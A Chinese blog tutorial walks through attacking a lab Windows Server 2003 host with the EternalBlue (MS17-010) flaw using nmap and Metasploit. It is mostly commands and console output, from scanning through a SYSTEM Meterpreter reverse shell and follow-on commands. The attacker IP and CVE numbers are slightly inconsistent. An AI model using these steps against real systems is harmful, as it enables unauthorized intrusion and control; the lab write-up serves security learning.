永恒之蓝ms17_010利用及攻击（CVE-2017-0146）

最新推荐文章于 2025-09-04 12:12:34 发布

原创最新推荐文章于 2025-09-04 12:12:34 发布 · 2.6k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#linux #安全 #windows

后渗透内网提权专栏收录该内容

17 篇文章

订阅专栏

本文详细介绍了如何使用Metasploit框架进行永恒之蓝（MS17-010）漏洞的探测与利用，包括设置攻击参数、验证漏洞存在性并最终实现对目标系统的远程控制。

部署运行你感兴趣的模型镜像

简介

永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

实验环境

攻击机：kali linux       192.168.1.106
目标机：win2003          192.168.1.103

利用攻击

首先我们可以利用nmap来扫描一下可能存在的漏洞

msf5 > nmap --script=vuln 192.168.1.103
[*] exec: nmap --script=vuln 192.168.1.103

Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-29 13:52 CST
Nmap scan report for 192.168.1.103
Host is up (0.00051s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:FE:8D:2D (VMware)

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 23.40 seconds

可以看到存在ms17_010，那么我们可以进一步的验证是否存在。
搜索：ms17-010

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

选择漏洞辅助模块进行探测

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

yes的参数要全部填上，可以看到只有RHOSTS（扫描的地址）没有，设置扫描地址的方法如下：

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf5 auxiliary(scanner/smb/smb_ms17_010) > options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.1.103                                                   yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

run/exploit：启动一下

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.1.103:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.1.103:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

存在ms17_010漏洞，那么我们设置攻击脚本

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > options 

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic

步骤同上，还是要设置一下要攻击的地址

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf5 exploit(windows/smb/ms17_010_psexec) > options 

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                192.168.1.103                                                   yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic

设置完毕就可以启动

msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] 192.168.1.103:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.1.103:445 - Filling barrel with fish... done
[*] 192.168.1.103:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.103:445 - 	[*] Preparing dynamite...
[*] 192.168.1.103:445 - 		Trying stick 1 (x64)...Miss
[*] 192.168.1.103:445 - 		[*] Trying stick 2 (x86)...Boom!
[*] 192.168.1.103:445 - 	[+] Successfully Leaked Transaction!
[*] 192.168.1.103:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 192.168.1.103:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.1.103:445 - Reading from CONNECTION struct at: 0x90670b08
[*] 192.168.1.103:445 - Built a write-what-where primitive...
[+] 192.168.1.103:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.103:445 - Selecting native target
[*] 192.168.1.103:445 - Uploading payload... eqCoYHQN.exe
[*] 192.168.1.103:445 - Created \eqCoYHQN.exe...
[+] 192.168.1.103:445 - Service started successfully...
[*] 192.168.1.103:445 - Deleting \eqCoYHQN.exe...
[-] 192.168.1.103:445 - Delete of \eqCoYHQN.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
[*] Sending stage (179779 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.103:1029) at 2020-08-29 14:16:13 +0800

可以看到已经建立了连接，接下来我们可以：

显示远程主机系统信息：sysinfo
查看用户身份：getuid
对远程主机当前屏幕进行截图：screenshot
获得shell控制台：shell
......等

您可能感兴趣的与本文相关的镜像

Wan2.2-T2V-A5B

文生视频

Wan2.2

Wan2.2是由通义万相开源高效文本到视频生成模型，是有50亿参数的轻量级视频生成模型，专为快速内容创作优化。支持480P视频生成，具备优秀的时序连贯性和运动推理能力